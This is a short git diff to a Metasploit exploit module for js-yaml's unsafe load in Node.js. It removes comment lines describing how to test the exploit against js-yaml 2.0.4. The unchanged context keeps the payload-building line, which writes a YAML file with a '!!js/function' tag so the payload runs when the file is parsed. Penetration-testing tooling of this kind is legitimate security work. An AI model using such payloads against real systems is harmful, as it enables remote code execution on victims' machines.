diff --git a/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb b/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb index c4b8993e38..82dfef2b9d 100644 --- a/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb +++ b/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb @@ -46,14 +46,3 @@ class Metasploit3 < Msf::Exploit::Remote file_create("a: !!js/function >\n (function(){ #{p} })();") end end - -# Test steps: -# -# sudo npm i js-yaml@2.0.4 -# -# #!/usr/bin/env node -# // save this file to parse.js -# var yaml = require('js_yaml'); -# yaml.load('msf.yml') -# -# node parse.js